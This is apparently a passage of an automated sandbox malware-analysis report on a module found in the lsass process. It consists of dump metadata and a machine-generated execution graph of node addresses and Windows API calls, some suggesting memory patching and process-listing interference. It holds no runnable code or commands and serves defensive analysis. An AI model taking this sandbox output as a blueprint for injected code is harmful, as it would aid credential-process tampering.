                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0

                                                  Execution Graph

                                                  Execution Coverage: 1.7%
                                                  Dynamic/Decrypted Code Coverage: 0%
                                                  Signature Coverage: 0%
                                                  Total number of Nodes: 1393
                                                  Total number of Limit Nodes: 7
8992->8993 8993->8997 8994->8983 8994->8986 8995->8983 8996->8992 8997->8983 8997->8990 8999 22f4b92d4d6 8998->8999 9000 22f4b92d4fa 8998->9000 9003 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8999->9003 9007 22f4b92d4e5 8999->9007 9001 22f4b92d500 9000->9001 9002 22f4b92d55f 9000->9002 9005 22f4b92d515 9001->9005 9001->9007 9008 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9001->9008 9004 22f4b92ece8 WideCharToMultiByte 9002->9004 9003->9007 9014 22f4b92d583 9004->9014 9009 22f4b92c5d0 14 API calls 9005->9009 9006 22f4b92d58a GetLastError 9010 22f4b92d184 13 API calls 9006->9010 9007->8899 9008->9005 9009->9007 9013 22f4b92d597 9010->9013 9011 22f4b92d5c7 9011->9007 9012 22f4b92ece8 WideCharToMultiByte 9011->9012 9017 22f4b92d629 9012->9017 9018 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9013->9018 9014->9006 9014->9011 9015 22f4b92d5bb 9014->9015 9019 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9014->9019 9016 22f4b92c5d0 14 API calls 9015->9016 9016->9011 9017->9006 9017->9007 9018->9007 9019->9015 9021 22f4b930b52 9020->9021 9022 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9021->9022 9027 22f4b930b67 9021->9027 9023 22f4b930b5c 9022->9023 9024 22f4b92d04c _invalid_parameter_noinfo 38 API calls 9023->9024 9024->9027 9025 22f4b928070 _invalid_parameter_noinfo 8 API calls 9026 22f4b930ea8 9025->9026 9026->8903 9027->9025 9029 22f4b931a12 HeapSize 9028->9029 9030 22f4b9319f9 9028->9030 9031 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9030->9031 9032 22f4b9319fe 9031->9032 9033 22f4b92d04c _invalid_parameter_noinfo 38 API calls 9032->9033 9034 22f4b931a09 9033->9034 9034->8962 9036 22f4b931a5f 9035->9036 9037 22f4b931a55 9035->9037 9039 22f4b931a64 9036->9039 9045 22f4b931a6b Concurrency::details::SchedulerProxy::DeleteThis 9036->9045 9038 22f4b92c5d0 14 API calls 9037->9038 9043 
22f4b931a5d 9038->9043 9040 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9039->9040 9040->9043 9041 22f4b931a71 9044 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9041->9044 9042 22f4b931a9e HeapReAlloc 9042->9043 9042->9045 9043->8966 9044->9043 9045->9041 9045->9042 9046 22f4b92b470 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9045->9046 9046->9045 8588 22f4b922ed8 8590 22f4b922f35 8588->8590 8589 22f4b922f50 8590->8589 8591 22f4b9238a8 3 API calls 8590->8591 8591->8589 9047 22f4b93485e 9048 22f4b929324 _CreateFrameInfo 9 API calls 9047->9048 9049 22f4b93486c 9048->9049 9050 22f4b934877 9049->9050 9051 22f4b929324 _CreateFrameInfo 9 API calls 9049->9051 9051->9050 8592 22f4b92f6dc 8593 22f4b92f6e8 8592->8593 8594 22f4b92f70f 8593->8594 8596 22f4b931c0c 8593->8596 8597 22f4b931c11 8596->8597 8598 22f4b931c4c 8596->8598 8599 22f4b931c32 DeleteCriticalSection 8597->8599 8600 22f4b931c44 8597->8600 8598->8593 8599->8599 8599->8600 8601 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8600->8601 8601->8598 7957 22f4b9225dc 7959 22f4b92265a 7957->7959 7958 22f4b922777 7959->7958 7960 22f4b9226bf GetFileType 7959->7960 7961 22f4b9226e1 7960->7961 7962 22f4b9226cd StrCpyW 7960->7962 7963 22f4b921ad4 4 API calls 7961->7963 7966 22f4b9226ee 7962->7966 7963->7966 7964 22f4b923f88 StrCmpNIW 7964->7966 7965 22f4b923708 4 API calls 7965->7966 7966->7958 7966->7964 7966->7965 7967 22f4b921dd4 2 API calls 7966->7967 7967->7966 8235 22f4b92c180 8238 22f4b92bf38 8235->8238 8245 22f4b92bf00 8238->8245 8246 22f4b92bf10 8245->8246 8247 22f4b92bf15 8245->8247 8248 22f4b92bebc 13 API calls 8246->8248 8249 22f4b92bf1c 8247->8249 8248->8247 8250 22f4b92bf31 8249->8250 8251 22f4b92bf2c 8249->8251 8253 22f4b92bebc 8250->8253 8252 22f4b92bebc 13 API calls 8251->8252 8252->8250 8254 22f4b92bec1 8253->8254 8255 22f4b92bef2 8253->8255 8256 22f4b92beea 8254->8256 8258 22f4b92d2a0 
Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8254->8258 8257 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8256->8257 8257->8255 8258->8254 8602 22f4b922300 8603 22f4b922331 8602->8603 8604 22f4b922447 8603->8604 8610 22f4b922355 8603->8610 8611 22f4b922412 8603->8611 8605 22f4b9224bb 8604->8605 8606 22f4b92244c 8604->8606 8608 22f4b9235c8 11 API calls 8605->8608 8605->8611 8619 22f4b9235c8 GetProcessHeap HeapAlloc 8606->8619 8608->8611 8609 22f4b92238d StrCmpNIW 8609->8610 8610->8609 8610->8611 8613 22f4b921d30 8610->8613 8614 22f4b921db4 8613->8614 8615 22f4b921d57 GetProcessHeap HeapAlloc 8613->8615 8614->8610 8615->8614 8616 22f4b921d92 8615->8616 8617 22f4b921cfc 2 API calls 8616->8617 8618 22f4b921d9a GetProcessHeap HeapFree 8617->8618 8618->8614 8624 22f4b92361b 8619->8624 8620 22f4b9236d9 GetProcessHeap HeapFree 8620->8611 8621 22f4b9236d4 8621->8620 8622 22f4b923666 StrCmpNIW 8622->8624 8623 22f4b921d30 6 API calls 8623->8624 8624->8620 8624->8621 8624->8622 8624->8623 8625 22f4b92b500 8630 22f4b92c558 EnterCriticalSection 8625->8630 9060 22f4b925c8d 9061 22f4b925c94 9060->9061 9062 22f4b925cfb 9061->9062 9063 22f4b925d77 VirtualProtect 9061->9063 9064 22f4b925db1 9063->9064 9065 22f4b925da3 GetLastError 9063->9065 9065->9064 7968 22f4b92820c 7975 22f4b928f34 7968->7975 7971 22f4b928219 7984 22f4b929340 7975->7984 7978 22f4b92c288 7979 22f4b92cb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7978->7979 7980 22f4b928222 7979->7980 7980->7971 7981 22f4b928f48 7980->7981 8009 22f4b9292dc 7981->8009 7983 22f4b928f51 7983->7971 7985 22f4b92935f GetLastError 7984->7985 7986 22f4b928215 7984->7986 7996 22f4b929c8c 7985->7996 7986->7971 7986->7978 8000 22f4b929aac 7996->8000 8001 22f4b929b96 TlsGetValue 8000->8001 8006 22f4b929af0 __vcrt_FlsAlloc 8000->8006 8002 22f4b929b1e LoadLibraryExW 8004 22f4b929b3f GetLastError 8002->8004 8005 22f4b929bbd 8002->8005 8003 22f4b929bdd GetProcAddress 8003->8001 
8004->8006 8005->8003 8007 22f4b929bd4 FreeLibrary 8005->8007 8006->8001 8006->8002 8006->8003 8008 22f4b929b61 LoadLibraryExW 8006->8008 8007->8003 8008->8005 8008->8006 8010 22f4b9292ed 8009->8010 8014 22f4b929302 8009->8014 8011 22f4b929c8c _CreateFrameInfo 6 API calls 8010->8011 8012 22f4b9292f2 8011->8012 8015 22f4b929cd4 8012->8015 8014->7983 8016 22f4b929aac __vcrt_FlsAlloc 5 API calls 8015->8016 8017 22f4b929d02 8016->8017 8018 22f4b929d14 TlsSetValue 8017->8018 8019 22f4b929d0c 8017->8019 8018->8019 8019->8014 8631 22f4b928f0c 8638 22f4b92946c 8631->8638 8634 22f4b928f19 8639 22f4b929474 8638->8639 8641 22f4b9294a5 8639->8641 8642 22f4b928f15 8639->8642 8655 22f4b929d28 8639->8655 8643 22f4b9294b4 __vcrt_uninitialize_locks DeleteCriticalSection 8641->8643 8642->8634 8644 22f4b929400 8642->8644 8643->8642 8660 22f4b929bfc 8644->8660 8656 22f4b929aac __vcrt_FlsAlloc 5 API calls 8655->8656 8657 22f4b929d5e 8656->8657 8658 22f4b929d73 InitializeCriticalSectionAndSpinCount 8657->8658 8659 22f4b929d68 8657->8659 8658->8659 8659->8639 8661 22f4b929aac __vcrt_FlsAlloc 5 API calls 8660->8661 8662 22f4b929c21 TlsAlloc 8661->8662 9066 22f4b928672 9067 22f4b9290c0 __std_exception_copy 38 API calls 9066->9067 9068 22f4b92869d 9067->9068 8259 22f4b92f370 VirtualProtect 9069 22f4b92f870 9070 22f4b92f8a0 9069->9070 9072 22f4b92f8c7 9069->9072 9071 22f4b92cb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9070->9071 9070->9072 9076 22f4b92f8b4 9070->9076 9071->9076 9073 22f4b92f99c 9072->9073 9092 22f4b92c558 EnterCriticalSection 9072->9092 9075 22f4b92fa03 9073->9075 9077 22f4b92fab3 9073->9077 9078 22f4b92f9ca 9073->9078 9091 22f4b92fa61 9075->9091 9093 22f4b92c5ac LeaveCriticalSection 9075->9093 9076->9072 9079 22f4b92f949 9076->9079 9088 22f4b92f904 9076->9088 9080 22f4b92fac0 9077->9080 9094 22f4b92c5ac LeaveCriticalSection 9077->9094 9078->9075 9087 22f4b92cab0 _invalid_parameter_noinfo 14 API calls 9078->9087 9081 22f4b92d1f4 
Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9079->9081 9084 22f4b92f94e 9081->9084 9086 22f4b92d04c _invalid_parameter_noinfo 38 API calls 9084->9086 9085 22f4b92cab0 14 API calls _invalid_parameter_noinfo 9085->9091 9086->9088 9089 22f4b92f9f3 9087->9089 9090 22f4b92cab0 _invalid_parameter_noinfo 14 API calls 9089->9090 9090->9075 9091->9085 8020 22f4b922ff0 8021 22f4b923061 8020->8021 8022 22f4b923384 8021->8022 8023 22f4b92308d GetModuleHandleA 8021->8023 8024 22f4b9230b1 8023->8024 8025 22f4b92309f GetProcAddress 8023->8025 8024->8022 8026 22f4b9230d8 StrCmpNIW 8024->8026 8025->8024 8026->8022 8027 22f4b9230fd 8026->8027 8027->8022 8028 22f4b921a30 6 API calls 8027->8028 8029 22f4b9232b9 lstrlenW 8027->8029 8030 22f4b92320f lstrlenW 8027->8030 8031 22f4b921cfc StrCmpIW StrCmpW 8027->8031 8032 22f4b923f88 StrCmpNIW 8027->8032 8028->8027 8029->8027 8030->8027 8031->8027 8032->8027 8664 22f4b9346f5 8665 22f4b929324 _CreateFrameInfo 9 API calls 8664->8665 8666 22f4b93470d 8665->8666 8667 22f4b929324 _CreateFrameInfo 9 API calls 8666->8667 8668 22f4b934728 8667->8668 8669 22f4b929324 _CreateFrameInfo 9 API calls 8668->8669 8670 22f4b93473c 8669->8670 8671 22f4b929324 _CreateFrameInfo 9 API calls 8670->8671 8672 22f4b93477e 8671->8672 8260 22f4b925974 8261 22f4b92597a 8260->8261 8272 22f4b927fa0 8261->8272 8266 22f4b925a77 8268 22f4b925bfd 8266->8268 8270 22f4b9259de 8266->8270 8285 22f4b927b80 8266->8285 8267 22f4b925cfb 8268->8267 8269 22f4b925d77 VirtualProtect 8268->8269 8269->8270 8271 22f4b925da3 GetLastError 8269->8271 8271->8270 8274 22f4b927fab 8272->8274 8273 22f4b9259bd 8273->8270 8281 22f4b924400 8273->8281 8274->8273 8275 22f4b92b470 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 8274->8275 8276 22f4b927fca 8274->8276 8275->8274 8277 22f4b927fd5 8276->8277 8291 22f4b9287b8 8276->8291 8295 22f4b9287d8 8277->8295 8282 22f4b92441d 8281->8282 8284 22f4b92448c 8282->8284 8304 22f4b924670 8282->8304 8284->8266 8286 22f4b927bc7 
8285->8286 8329 22f4b927950 8286->8329 8289 22f4b928070 _invalid_parameter_noinfo 8 API calls 8290 22f4b927bf1 8289->8290 8290->8266 8292 22f4b9287c6 std::bad_alloc::bad_alloc 8291->8292 8299 22f4b929178 8292->8299 8294 22f4b9287d7 8296 22f4b9287e6 std::bad_alloc::bad_alloc 8295->8296 8297 22f4b929178 Concurrency::cancel_current_task 2 API calls 8296->8297 8298 22f4b927fdb 8297->8298 8300 22f4b929197 8299->8300 8301 22f4b9291e2 RaiseException 8300->8301 8302 22f4b9291c0 RtlPcToFileHeader 8300->8302 8301->8294 8303 22f4b9291d8 8302->8303 8303->8301 8305 22f4b924694 8304->8305 8306 22f4b9246b7 8304->8306 8305->8306 8318 22f4b924120 8305->8318 8309 22f4b9246ed 8306->8309 8324 22f4b924250 8306->8324 8312 22f4b924250 2 API calls 8309->8312 8315 22f4b92471d 8309->8315 8310 22f4b924753 8311 22f4b92476f 8310->8311 8313 22f4b924120 3 API calls 8310->8313 8314 22f4b92478b 8311->8314 8317 22f4b924250 2 API calls 8311->8317 8312->8315 8313->8311 8314->8284 8315->8310 8316 22f4b924120 3 API calls 8315->8316 8316->8310 8317->8314 8319 22f4b924141 8318->8319 8320 22f4b924196 VirtualQuery 8319->8320 8321 22f4b9241b0 8319->8321 8322 22f4b9241ca VirtualAlloc 8319->8322 8320->8319 8320->8321 8321->8306 8322->8321 8323 22f4b9241fb GetLastError 8322->8323 8323->8319 8327 22f4b924268 8324->8327 8325 22f4b9242d7 8325->8309 8326 22f4b9242bd VirtualQuery 8326->8325 8326->8327 8327->8325 8327->8326 8328 22f4b924322 GetLastError 8327->8328 8328->8327 8330 22f4b92796b 8329->8330 8331 22f4b927981 SetLastError 8330->8331 8332 22f4b92798f 8330->8332 8331->8332 8332->8289 8033 22f4b925ff9 8034 22f4b926000 VirtualProtect 8033->8034 8035 22f4b926029 GetLastError 8034->8035 8036 22f4b925f10 8034->8036 8035->8036 8037 22f4b9241f9 8038 22f4b924146 8037->8038 8039 22f4b924196 VirtualQuery 8038->8039 8040 22f4b9241b0 8038->8040 8041 22f4b9241ca VirtualAlloc 8038->8041 8039->8038 8039->8040 8041->8040 8042 22f4b9241fb GetLastError 8041->8042 8042->8038 8043 22f4b92cbfc 8048 22f4b92f3a0 8043->8048 8045 
22f4b92cc05 8046 22f4b92cb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8045->8046 8047 22f4b92cc22 __vcrt_uninitialize_ptd 8045->8047 8046->8047 8049 22f4b92f3b1 8048->8049 8050 22f4b92f3b5 8048->8050 8049->8045 8050->8049 8051 22f4b92ef88 9 API calls 8050->8051 8051->8049 9095 22f4b93387c 9096 22f4b9338b4 __GSHandlerCheckCommon 9095->9096 9097 22f4b9338e0 9096->9097 9099 22f4b929a24 9096->9099 9100 22f4b929324 _CreateFrameInfo 9 API calls 9099->9100 9101 22f4b929a4e 9100->9101 9102 22f4b929324 _CreateFrameInfo 9 API calls 9101->9102 9103 22f4b929a5b 9102->9103 9104 22f4b929324 _CreateFrameInfo 9 API calls 9103->9104 9105 22f4b929a64 9104->9105 9105->9097 8052 22f4b92f820 8055 22f4b92f7d8 8052->8055 8060 22f4b92c558 EnterCriticalSection 8055->8060 8061 22f4b92fe20 8062 22f4b92fe4a 8061->8062 8063 22f4b92d220 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8062->8063 8064 22f4b92fe6a 8063->8064 8065 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8064->8065 8066 22f4b92fe78 8065->8066 8067 22f4b92fea2 8066->8067 8068 22f4b92d220 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8066->8068 8069 22f4b92fec1 InitializeCriticalSectionEx 8067->8069 8072 22f4b92feab 8067->8072 8070 22f4b92fe94 8068->8070 8069->8067 8071 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8070->8071 8071->8067 8673 22f4b924320 8675 22f4b92426d 8673->8675 8674 22f4b9242bd VirtualQuery 8674->8675 8677 22f4b9242d7 8674->8677 8675->8674 8676 22f4b924322 GetLastError 8675->8676 8675->8677 8676->8675 8073 22f4b92c828 8074 22f4b92c842 8073->8074 8075 22f4b92c82d 8073->8075 8079 22f4b92c848 8075->8079 8080 22f4b92c892 8079->8080 8081 22f4b92c88a 8079->8081 8083 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8080->8083 8082 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8081->8082 8082->8080 8084 22f4b92c89f 8083->8084 8085 22f4b92d2a0 
Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8084->8085 8086 22f4b92c8ac 8085->8086 8087 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8086->8087 8088 22f4b92c8b9 8087->8088 8089 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8088->8089 8090 22f4b92c8c6 8089->8090 8091 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8090->8091 8092 22f4b92c8d3 8091->8092 8093 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8092->8093 8094 22f4b92c8e0 8093->8094 8095 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8094->8095 8096 22f4b92c8ed 8095->8096 8097 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8096->8097 8098 22f4b92c8fd 8097->8098 8099 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8098->8099 8100 22f4b92c90d 8099->8100 8105 22f4b92c6f8 8100->8105 8119 22f4b92c558 EnterCriticalSection 8105->8119 8333 22f4b930fa8 8334 22f4b930fcc 8333->8334 8335 22f4b928070 _invalid_parameter_noinfo 8 API calls 8334->8335 8336 22f4b93100e 8335->8336 8337 22f4b9233a8 8338 22f4b9233cf 8337->8338 8339 22f4b92349c 8338->8339 8340 22f4b9233ec PdhGetCounterInfoW 8338->8340 8340->8339 8341 22f4b92340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 8340->8341 8342 22f4b923440 StrCmpW 8341->8342 8343 22f4b923488 GetProcessHeap HeapFree 8341->8343 8342->8343 8344 22f4b923455 8342->8344 8343->8339 8344->8343 8346 22f4b923950 StrCmpNW 8344->8346 8347 22f4b923982 StrStrW 8346->8347 8348 22f4b9239f2 8346->8348 8347->8348 8349 22f4b92399b StrToIntW 8347->8349 8348->8344 8349->8348 8350 22f4b9239c3 8349->8350 8350->8348 8356 22f4b921a30 OpenProcess 8350->8356 8353 22f4b923f88 StrCmpNIW 8354 22f4b9239e4 8353->8354 8354->8348 8362 22f4b921cfc 8354->8362 8357 22f4b921ab6 8356->8357 8358 22f4b921a64 K32GetModuleFileNameExW 8356->8358 8357->8348 8357->8353 8359 22f4b921aad CloseHandle 8358->8359 8360 22f4b921a7e 
PathFindFileNameW lstrlenW 8358->8360 8359->8357 8360->8359 8361 22f4b921a9c StrCpyW 8360->8361 8361->8359 8363 22f4b921d1c 8362->8363 8364 22f4b921d13 8362->8364 8363->8348 8365 22f4b921530 2 API calls 8364->8365 8365->8363 9129 22f4b92aaac 9130 22f4b92aad9 __except_validate_context_record 9129->9130 9131 22f4b929324 _CreateFrameInfo 9 API calls 9130->9131 9132 22f4b92aade 9131->9132 9134 22f4b92ab38 9132->9134 9136 22f4b92abc6 9132->9136 9143 22f4b92ab8c 9132->9143 9133 22f4b92ac34 9133->9143 9171 22f4b92a22c 9133->9171 9135 22f4b92abb3 9134->9135 9134->9143 9144 22f4b92ab5a __GetCurrentState 9134->9144 9158 22f4b9295d0 9135->9158 9140 22f4b92abe5 9136->9140 9165 22f4b9299cc 9136->9165 9140->9133 9140->9143 9168 22f4b9299e0 9140->9168 9141 22f4b92acdd 9144->9141 9146 22f4b92afb8 9144->9146 9147 22f4b9299cc Is_bad_exception_allowed 9 API calls 9146->9147 9148 22f4b92afe7 __GetCurrentState 9147->9148 9149 22f4b929324 _CreateFrameInfo 9 API calls 9148->9149 9156 22f4b92b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9149->9156 9150 22f4b92b0fb 9151 22f4b929324 _CreateFrameInfo 9 API calls 9150->9151 9152 22f4b92b100 9151->9152 9153 22f4b929324 _CreateFrameInfo 9 API calls 9152->9153 9154 22f4b92b10b __FrameHandler3::GetHandlerSearchState 9152->9154 9153->9154 9154->9143 9155 22f4b9299cc 9 API calls Is_bad_exception_allowed 9155->9156 9156->9150 9156->9154 9156->9155 9157 22f4b9299f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9156->9157 9157->9156 9228 22f4b929634 9158->9228 9160 22f4b9295ef __FrameHandler3::ExecutionInCatch 9232 22f4b929540 9160->9232 9163 22f4b92afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9164 22f4b929624 9163->9164 9164->9143 9166 22f4b929324 _CreateFrameInfo 9 API calls 9165->9166 9167 22f4b9299d5 9166->9167 9167->9140 9169 22f4b929324 _CreateFrameInfo 9 API calls 9168->9169 9170 22f4b9299e9 9169->9170 9170->9133 9236 22f4b92b144 9171->9236 9174 22f4b92a6f4 9175 22f4b92a645 9175->9174 9214 22f4b92a643 
9175->9214 9289 22f4b92a6fc 9175->9289 9176 22f4b92a373 9176->9175 9220 22f4b92a3ab 9176->9220 9177 22f4b929324 _CreateFrameInfo 9 API calls 9179 22f4b92a687 9177->9179 9179->9174 9183 22f4b928070 _invalid_parameter_noinfo 8 API calls 9179->9183 9180 22f4b92a575 9184 22f4b92a592 9180->9184 9186 22f4b9299cc Is_bad_exception_allowed 9 API calls 9180->9186 9180->9214 9181 22f4b929324 _CreateFrameInfo 9 API calls 9182 22f4b92a2da 9181->9182 9182->9179 9187 22f4b929324 _CreateFrameInfo 9 API calls 9182->9187 9185 22f4b92a69a 9183->9185 9191 22f4b92a5b4 9184->9191 9184->9214 9282 22f4b9295a4 9184->9282 9185->9143 9186->9184 9188 22f4b92a2ea 9187->9188 9190 22f4b929324 _CreateFrameInfo 9 API calls 9188->9190 9194 22f4b92a2f3 9190->9194 9192 22f4b92a5ca 9191->9192 9193 22f4b92a6d7 9191->9193 9191->9214 9195 22f4b92a5d5 9192->9195 9198 22f4b9299cc Is_bad_exception_allowed 9 API calls 9192->9198 9196 22f4b929324 _CreateFrameInfo 9 API calls 9193->9196 9247 22f4b929a0c 9194->9247 9202 22f4b92b1dc 9 API calls 9195->9202 9199 22f4b92a6dd 9196->9199 9198->9195 9201 22f4b929324 _CreateFrameInfo 9 API calls 9199->9201 9204 22f4b92a6e6 9201->9204 9205 22f4b92a5eb 9202->9205 9203 22f4b9299e0 9 API calls 9203->9220 9207 22f4b92c2f4 14 API calls 9204->9207 9209 22f4b929634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 9205->9209 9205->9214 9206 22f4b929324 _CreateFrameInfo 9 API calls 9208 22f4b92a335 9206->9208 9207->9174 9208->9176 9211 22f4b929324 _CreateFrameInfo 9 API calls 9208->9211 9210 22f4b92a605 9209->9210 9286 22f4b929838 RtlUnwindEx 9210->9286 9213 22f4b92a341 9211->9213 9215 22f4b929324 _CreateFrameInfo 9 API calls 9213->9215 9214->9177 9217 22f4b92a34a 9215->9217 9250 22f4b92b1dc 9217->9250 9220->9180 9220->9203 9261 22f4b92a96c 9220->9261 9275 22f4b92a158 9220->9275 9222 22f4b92a35e 9257 22f4b92b2cc 9222->9257 9224 22f4b92a6d1 9225 22f4b92c2f4 14 API calls 9224->9225 9225->9193 9226 22f4b92a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 9226->9224 
9227 22f4b929178 Concurrency::cancel_current_task 2 API calls 9226->9227 9227->9224 9231 22f4b929662 __FrameHandler3::ExecutionInCatch 9228->9231 9229 22f4b9296d4 9229->9160 9230 22f4b92968c RtlLookupFunctionEntry 9230->9231 9231->9229 9231->9230 9233 22f4b929560 9232->9233 9234 22f4b92958b 9232->9234 9233->9234 9235 22f4b929324 _CreateFrameInfo 9 API calls 9233->9235 9234->9163 9235->9233 9237 22f4b92b169 __FrameHandler3::ExecutionInCatch 9236->9237 9238 22f4b929634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 9237->9238 9239 22f4b92b17e 9238->9239 9301 22f4b929db4 9239->9301 9242 22f4b92b190 __FrameHandler3::GetHandlerSearchState 9304 22f4b929dec 9242->9304 9243 22f4b92b1b3 9244 22f4b929db4 __GetUnwindTryBlock RtlLookupFunctionEntry 9243->9244 9245 22f4b92a28e 9244->9245 9245->9174 9245->9176 9245->9181 9248 22f4b929324 _CreateFrameInfo 9 API calls 9247->9248 9249 22f4b929a1a 9248->9249 9249->9174 9249->9206 9252 22f4b92b2c3 9250->9252 9254 22f4b92b207 9250->9254 9251 22f4b92a35a 9251->9176 9251->9222 9253 22f4b9299e0 9 API calls 9253->9254 9254->9251 9254->9253 9255 22f4b9299cc Is_bad_exception_allowed 9 API calls 9254->9255 9256 22f4b92a96c 9 API calls 9254->9256 9255->9254 9256->9254 9258 22f4b92b339 9257->9258 9260 22f4b92b2e9 Is_bad_exception_allowed 9257->9260 9258->9226 9259 22f4b9299cc 9 API calls Is_bad_exception_allowed 9259->9260 9260->9258 9260->9259 9262 22f4b92a999 9261->9262 9271 22f4b92aa28 9261->9271 9263 22f4b9299cc Is_bad_exception_allowed 9 API calls 9262->9263 9264 22f4b92a9a2 9263->9264 9265 22f4b9299cc Is_bad_exception_allowed 9 API calls 9264->9265 9266 22f4b92a9bb 9264->9266 9264->9271 9265->9266 9267 22f4b92a9e7 9266->9267 9268 22f4b9299cc Is_bad_exception_allowed 9 API calls 9266->9268 9266->9271 9269 22f4b9299e0 9 API calls 9267->9269 9268->9267 9270 22f4b92a9fb 9269->9270 9270->9271 9272 22f4b92aa14 9270->9272 9273 22f4b9299cc Is_bad_exception_allowed 9 API calls 9270->9273 9271->9220 9274 22f4b9299e0 9 API calls 
9272->9274 9273->9272 9274->9271 9276 22f4b929634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 9275->9276 9277 22f4b92a195 9276->9277 9278 22f4b9299cc Is_bad_exception_allowed 9 API calls 9277->9278 9279 22f4b92a1cd 9278->9279 9280 22f4b929838 9 API calls 9279->9280 9281 22f4b92a211 9280->9281 9281->9220 9283 22f4b9295b8 __FrameHandler3::ExecutionInCatch 9282->9283 9284 22f4b929540 __FrameHandler3::ExecutionInCatch 9 API calls 9283->9284 9285 22f4b9295c2 9284->9285 9285->9191 9287 22f4b928070 _invalid_parameter_noinfo 8 API calls 9286->9287 9288 22f4b929932 9287->9288 9288->9214 9290 22f4b92a735 9289->9290 9291 22f4b92a948 9289->9291 9292 22f4b929324 _CreateFrameInfo 9 API calls 9290->9292 9291->9214 9293 22f4b92a73a 9292->9293 9294 22f4b92a759 EncodePointer 9293->9294 9299 22f4b92a7ac 9293->9299 9295 22f4b929324 _CreateFrameInfo 9 API calls 9294->9295 9296 22f4b92a769 9295->9296 9296->9299 9307 22f4b9294ec 9296->9307 9298 22f4b92a158 19 API calls 9298->9299 9299->9291 9299->9298 9300 22f4b9299cc 9 API calls Is_bad_exception_allowed 9299->9300 9300->9299 9302 22f4b929634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 9301->9302 9303 22f4b929dc7 9302->9303 9303->9242 9303->9243 9305 22f4b929634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 9304->9305 9306 22f4b929e06 9305->9306 9306->9245 9308 22f4b929324 _CreateFrameInfo 9 API calls 9307->9308 9309 22f4b929518 9308->9309 9309->9299 8121 22f4b934611 __scrt_dllmain_exception_filter 8681 22f4b92c510 8682 22f4b92c518 8681->8682 8683 22f4b92c545 8682->8683 8685 22f4b92c574 8682->8685 8686 22f4b92c59f 8685->8686 8687 22f4b92c582 DeleteCriticalSection 8686->8687 8688 22f4b92c5a3 8686->8688 8687->8686 8688->8683 8122 22f4b92c218 8123 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8122->8123 8124 22f4b92c228 8123->8124 8125 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8124->8125 8126 22f4b92c23c 8125->8126 8127 
